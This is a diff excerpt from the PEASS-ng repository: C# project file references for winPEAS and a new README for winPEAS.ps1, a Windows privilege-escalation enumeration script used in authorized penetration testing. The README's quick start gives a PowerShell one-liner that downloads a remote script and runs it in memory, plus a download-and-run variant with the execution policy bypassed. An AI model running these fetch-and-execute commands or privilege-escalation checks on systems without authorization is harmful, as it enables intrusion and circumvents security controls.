<Reference Include="AlphaFS, Version=2.2.0.0, Culture=neutral, PublicKeyToken=4d31a58f7d7ad5c9, processorArchitecture=MSIL">
<HintPath>..\packages\AlphaFS.2.2.6\lib\net452\AlphaFS.dll</HintPath>
</Reference>
<Reference Include="System" />
<Reference Include="System.Core" />
<Reference Include="System.DirectoryServices.AccountManagement" />
<Reference Include="System.Management" />
<Reference Include="System.Security" />
<Reference Include="System.ServiceProcess" />
<Reference Include="System.Transactions" />
<Reference Include="System.Web.Extensions" />
<Reference Include="System.Windows.Forms" />
<Reference Include="System.Xml.Linq" />
@@ -696,6 +700,7 @@
<Link>sensitive_files.yaml</Link>
</EmbeddedResource>
<None Include="App.config" />
<None Include="packages.config" />
<None Include="TaskScheduler\V1\TaskSchedulerV1Schema.xsd">
<SubType>Designer</SubType>
</None>
winPEAS/winPEASps1/README.md (new executable file, 26 lines)
@@ -0,0 +1,26 @@
# Windows Privilege Escalation Awesome Script (.ps1)



**WinPEAS is a script that searches for possible paths to escalate privileges on Windows hosts. The checks are explained on [book.hacktricks.xyz](https://book.hacktricks.xyz/windows-hardening/windows-local-privilege-escalation)**

Check also the **Local Windows Privilege Escalation checklist** from **[book.hacktricks.xyz](https://book.hacktricks.xyz/windows-hardening/checklist-windows-privilege-escalation)**

## Maintainer

The official **maintainer of this script is [RandolphConley](https://github.com/RandolphConley)**.

## Quick Start

Download the **[latest release from here](https://github.com/carlospolop/PEASS-ng/releases/latest)**.

```bash
powershell "IEX(New-Object Net.WebClient).downloadString('https://raw.githubusercontent.com/carlospolop/PEASS-ng/master/winPEAS/winPEASps1/WinPeas.ps1')"
```
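If loading the script straight into memory is not an option, a sketch of an alternative (assuming the script needs no mandatory parameters) is to download it first and run it locally:

```bash
powershell -ep bypass -c "IWR -UseBasicParsing 'https://raw.githubusercontent.com/carlospolop/PEASS-ng/master/winPEAS/winPEASps1/WinPeas.ps1' -OutFile WinPeas.ps1; .\WinPeas.ps1"
```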
## Advisory

All the scripts/binaries of the PEAS Suite should be used for authorized penetration testing and/or educational purposes only. Any misuse of this software will not be the responsibility of the author or of any other collaborator. Use it on your own networks and/or with the network owner's permission.


By Polop
winPEAS/winPEASps1/winPEAS.ps1 (new file, 1223 lines; file diff suppressed because it is too large)